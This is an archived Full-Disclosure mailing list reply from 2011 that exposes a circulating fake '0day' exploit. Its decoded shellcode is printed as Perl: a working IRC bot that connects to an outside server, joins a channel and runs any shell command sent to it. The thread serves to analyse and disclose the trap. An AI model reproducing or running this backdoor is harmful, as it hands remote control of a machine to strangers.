[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)



#!/usr/bin/perl$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
+i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
$sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "RIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
2>/dev/null;/tmp/hi

2011/10/27 Joshua Thomas <rappercrazzy@xxxxxxxxx>:
> Use this link to decode the shellcode ...
> ---> http://www.dolcevie.com/js/converter.html
>
> This executes the perl code on the local machine .... :D
>
>
>
>
> On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>
>> Hello List,
>> Id like people to also, like this thread asks, to pls give some opinion,
>> other than mine.. wich, i am yet to make;
>>
>> http://www.hackerthreads.org/Topic-5973
>>
>> Please look at this .c code on here, if you wish, and tell me, why
>> A. It is still in circulation, seeminlgly, on MANY MANY boxes....
>> B. people still seem to try keep it private :s
>>
>> This morning, a friend from webhostingtalk.com ,asked me to take a look.
>> I have and, i can only sofar say, once i decrypt the shellcode, ill  know
>> abit more..
>> altho , i rmember this thing, and, somany people were after it, people
>> were paying for it, this is first time i have seen it actually disclosed
>> tho,
>> admittedly only looked today.
>> If skiddies are using it to ddos things, I want to makesure i can expose
>> it, and kill the threats.
>> thankyou.
>> xd .// exposing bullshit as i ride!
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/